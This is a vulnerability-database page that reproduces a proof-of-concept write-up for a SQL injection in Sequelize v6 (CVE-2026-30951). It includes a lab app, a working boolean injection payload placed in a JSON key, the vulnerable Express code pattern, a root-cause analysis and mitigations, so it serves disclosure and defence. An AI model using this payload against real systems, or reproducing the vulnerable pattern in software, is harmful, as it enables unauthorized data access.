Vulners
Lucene search
📄 Sequelize 6.37.7 SQL Injection
| Reporter | Title | Published | Views | Family All 24 |
|---|---|---|---|---|
 | Security Bulletin: Multiple vulnerabilities in IBM Security QRadar EDR Software | 2 Jun 202608:49 | – | ibm |
 | CVE-2026-30951 | 10 Mar 202620:22 | – | attackerkb |
 | CVE-2026-30951 vulnerabilities | 20 Mar 202601:17 | – | cgr |
 | CVE-2026-30951 | 9 Mar 202621:42 | – | circl |
 | Sequelize SQL注入漏洞 | 10 Mar 202600:00 | – | cnnvd |
 | CVE-2026-30951 | 10 Mar 202620:22 | – | cve |
 | CVE-2026-30951 Sequelize v6 Vulnerable to SQL Injection via JSON Column Cast Type | 10 Mar 202620:22 | – | cvelist |
 | EUVD-2026-10870 | 11 Mar 202600:18 | – | euvd |
| EUVD-2026-10871 | 11 Mar 202600:18 | – | euvd |
 | K000161154: Sequelize vulnerability CVE-2026-30951 | 7 May 202605:16 | – | f5 |
10
# CVE-2026-30951 Sequelize JSON Cast SQL Injection
**★ CVE-2026-30951 Sequelize ORM SQL Injection PoC ★**
https://github.com/user-attachments/assets/30b19211-890a-4780-acd9-04856ec98381
# Overview
> **CVE-2026-30951** is a **SQL Injection** vulnerability in **Sequelize v6**, a widely used Node.js ORM.
>
> The vulnerability exists in JSON/JSONB `where` clause processing. When Sequelize parses a JSON path key containing `::`, the value after `::` is treated as a SQL cast type and is inserted into the generated SQL without proper validation.
>
> If an attacker can control JSON object keys passed into a Sequelize `where` clause, they can manipulate the generated SQL query.
# Affected Versions
| Category | Version |
| --- | --- |
| **Vulnerable** | Sequelize **v6.x \<= 6.37.7** |
| **Patched** | Sequelize **6.37.8** |
| **Not affected** | Sequelize v7 / `@sequelize/core` |
# Impact
* SQL injection through attacker-controlled JSON object keys
* Search filter bypass through boolean-based injection
* Unintended query condition manipulation inside ORM-generated SQL
# Environment
This repository contains a minimal vulnerable Node.js, Express, Sequelize, and SQLite challenge app.
## Local Run
```
npm install
npm start
```
The app starts on:
```
http://127.0.0.1:9100
```
## Docker
```
docker build -t cve-2026-30951-sequelize-vuln .
docker run --rm -it -p 9100:9100 --name sequelize-vuln cve-2026-30951-sequelize-vuln
```
The Docker container starts on:
```
http://127.0.0.1:9100
```
# PoC
After starting the vulnerable environment, follow the steps below to reproduce the injection.
## Step 1. Send a normal search request
```
POST /api/users/search
Content-Type: application/json
{
"filter": {
"name": "emma"
}
}
```
This returns only users matching the normal name search logic.
## Step 2. Trigger a boolean-based SQL injection
```
POST /api/users/search
Content-Type: application/json
{
"filter": {
"name::text) or 1=1--": "emma"
}
}
```
Expected result:
```
All user rows are returned.
```
## Step 3. Confirm that SQL injection occurred
The crafted JSON key causes Sequelize to generate a cast expression similar to:
```
CAST(json_extract(`User`.`metadata`, '$.name') AS TEXT) OR 1=1--)
```
Because the cast type is attacker-controlled, the `OR 1=1` condition changes the intended `WHERE` clause behavior. Returning all rows from the same search endpoint confirms that SQL injection is possible.
## Analysis
### Technical Root Cause
The vulnerability is caused by insufficient validation of JSON cast types in Sequelize v6.
Internally, Sequelize's JSON traversal logic splits JSON path keys on `::`:
```
jsonKey::castType
```
The cast type is then used in generated SQL like:
```
CAST(<json_extract_expression> AS <cast_type>)
```
In vulnerable versions, `<cast_type>` is not safely escaped or restricted to a known-safe allowlist. This allows an attacker-controlled JSON key to break out of the cast expression and inject SQL.
### Dangerous Pattern
Any application pattern similar to the following may be vulnerable when using affected Sequelize versions:
```
app.post('/api/users/search', async (req, res) => {
const users = await User.findAll({
where: {
metadata: req.body.filter
}
});
res.json(users);
});
```
This is dangerous because the attacker controls not only JSON values, but also JSON object keys.
### Why This Matters
This vulnerability is especially dangerous because many developers assume ORM query builders automatically protect against SQL injection. In this case, the injection happens inside ORM-generated SQL, after the application has already passed structured JavaScript objects to Sequelize.
Depending on the application logic, exploitation may allow:
* bypassing intended search filters
* altering boolean query conditions
* changing the behavior of ORM-generated SQL
This is fundamentally a **CWE-89: Improper Neutralization of Special Elements used in an SQL Command** issue.
## Scenario
```
+-------------------------------------------+
| Attacker |
+-------------------------------------------+
|
| Sends crafted JSON filter
| with malicious name:: key
v
+-------------------------------------------+
| POST /api/users/search |
+-------------------------------------------+
|
| Sequelize JSON where clause
| processes key containing ::
v
+-------------------------------------------+
| Unescaped SQL cast type injection |
+-------------------------------------------+
|
| Boolean condition manipulation
v
+-------------------------------------------+
| SQL Injection Confirmed |
+-------------------------------------------+
```
# Mitigation
* Upgrade Sequelize to **6.37.8 or later**
* Do not pass user-controlled objects directly into Sequelize JSON/JSONB `where` clauses
* Reject or normalize user-controlled JSON keys before building ORM filters
* Use whitelist-based filter construction instead of accepting arbitrary request body objects
* Reject JSON keys containing SQL control syntax or cast separators such as `::` unless explicitly required
* Prefer server-defined query fields, for example:
```
const allowedFilters = ['name', 'role', 'team', 'office', 'department'];
if (!allowedFilters.includes(req.body.field)) {
throw new Error('Invalid filter field');
}
```
# Disclaimer
This repository is intended for security research, defensive validation, and educational use in controlled environments only.
Do not use this PoC against systems you do not own or do not have explicit permission to test.
# EQST Insight
We publish CVE and malware analysis once a month. If you're interested, please follow the links below to check out our publications.
- https://www.skshieldus.com/security-insights/reports?tab=eqst
# References
* https://github.com/sequelize/sequelize/security/advisories/GHSA-6457-6jrx-69cr
* https://nvd.nist.gov/vuln/detail/CVE-2026-30951
* https://osv.dev/vulnerability/CVE-2026-30951
* https://advisories.gitlab.com/npm/sequelize/CVE-2026-30951/
* https://github.com/sequelize/sequelizeData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Apr 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.17.5
EPSS0.00377
SSVC